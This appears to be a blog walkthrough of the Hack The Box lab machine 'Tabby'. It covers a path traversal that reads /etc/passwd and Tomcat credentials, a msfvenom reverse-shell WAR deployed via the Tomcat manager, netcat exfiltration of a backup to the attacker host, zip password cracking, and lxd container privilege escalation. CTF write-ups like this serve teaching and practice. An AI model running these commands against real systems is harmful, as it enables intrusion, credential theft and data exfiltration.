Tabby - [HTB]

Cover Image for Tabby - [HTB]
Marmeus
Marmeus

Table of Contents

    Introduction

    Tabby is a virtual machine where the hacker will require to exploit a Directory Path Traversal in the Tomcat service to get some credentials. Then, he or she will have to exploit tomcat manager in order to get a shell and finally using lxd containers with the purpose of becoming root and getting the flag.

    Enumeration

    As always, I start scanning every single port on the machine with the following command.

    
    sudo nmap -sS -p- -T5 --open -n 10.10.10.194 -oN AllPorts.txt
    
    

    As we can see there are just 3 services running so I’m going to use a deeper scan to get more information about them.

    
    sudo nmap -sC -sV -A -p22,80,8080 -n 10.10.10.194 -oN PortsInDepth.txt
    
    

    In the port 8080 you can find tomcat documentation.

    Doing a directory scan I found a manager webpage used by tomcat to manage different hosts. However, you need credentials.

    
    gobuster dir -t 20 -u http://10.10.10.194:8080/ -w
    /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o
    Directories.txt
    
    

    Inside the port 80 there is a website about hosting server.

    In the “News” webpage you need to access with the HackTheBox domain.

    For that you need to edit the “/etc/hosts” file , adding the IP +<TAB>+Domain.

    Once changed and edited this file, you can access to the web page.

    The “?file” request variable can be used to show files stored in the system. For instance, the classic /etc/passwd.

    http://megahosting.htb/news.php?file=/../../../../etc/passwd

    Looking into the Tomcat documentation I found the existence of the “tomcat-users.xml” file, where users are stored, so I need to find it.

    After some time I got the exact url where the credentials are stored.

    
    view-source:<http://megahosting.htb/news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml>
    
    

    Accessing to the host-manager webpage following url and writing the credentials you can access to the Tomcat Virtual Host Manager.

    Explotation

    **Tomcat Virtual Host Manager **seems to be vulnerable to deserialization attacks, so through these posts you can create your own exploit to get a revershell.

    https://www.certilience.fr/2019/03/tomcat-exploit-variant-host-manager/

    https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/

    https://octopus.com/blog/tomcat-manager-deployment

    
    msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST=10.10.14.59 LPORT=4444
    -f war \> shell.war
    
    curl -v -u 'tomcat:$3cureP4s5w0rd123\!' -T shell.war
    'http://10.10.10.194:8080/manager/text/deploy?path=/shell&update=true'
    
    curl -u 'tomcat:$3cureP4s5w0rd123\!' http://10.10.10.194:8080/shell/
    
    

    It is important to write “&update=true” so you can replace the existing file with a new one.

    Then, I wanted to upgrade the shell using python and rlwrap. If you want more info about upgrading your reverse shell check out this post.

    
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    
    

    Looking into the file system you can find a hidden backup.zip file inside the “/var/www/html/”

    I downloaded it using netcat with the followings commands.

    
    {Us} nc -nlvp 4445 \> backup.zip
    
    {Victim} nc -w 3 10.10.14.144 4445 \< 16162020\_backup.zip
    
    

    Shockingly, the zip file requires a password to extract the files

    With the purpose of getting the password I am going to use fcrackzip. If you want to get more information about fcrackzip read this post. In order to get the password you need to execute the following commands:

    
    sudo apt-get install fcrackzip -y
    
    fcrackzip -vuDp /usr/share/wordlists/rockyou.txt backup.zip 
    
    

    The meaning of the parameters are the following.

    -u (–use-unzip); helps with false positives

    -D (–dictionary); selects dictionary mode

    -p (–init-password string); use to select the rockyou.txt file

    -v (–verbose); not required

    The resulting password is “admin@it”. Which can be used to access as ash (one of the users in the machine) through “su”.

    Getting the user flag.

    Privilege escalation

    Thanks to linenum.sh seems to be that we can create containers with lxd.

    The following article provides you with all the needed information about how to exploit the container in order to get root’s file permissions in Tabby.

    https://www.hackingarticles.in/lxd-privilege-escalation/

    https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

    First of all, I suggest you to create create the exploit inside de ash’s home directory (“/home/ash”), because in my case didn’t work out doing it in the “/tmp/” directory.

    The commands to get the flag are the following:

    
    lxd init
    
    wget http://10.10.14.59:8000/alpine-v3.12-i686-20200904_1440.tar.gz
    
    lxc image import ./alpine-v3.12-i686-20200904\_1440.tar.gz --alias
    myimage
    
    lxc init myimage ignite -c security.privileged=true
    
    lxc config device add ignite mydevice disk source=/ path=/mnt/root
    recursive=true
    
    lxc start ignite
    
    lxc exec ignite /bin/sh
    
    id
    
    cd /mnt/root/root
    
    cat root.txt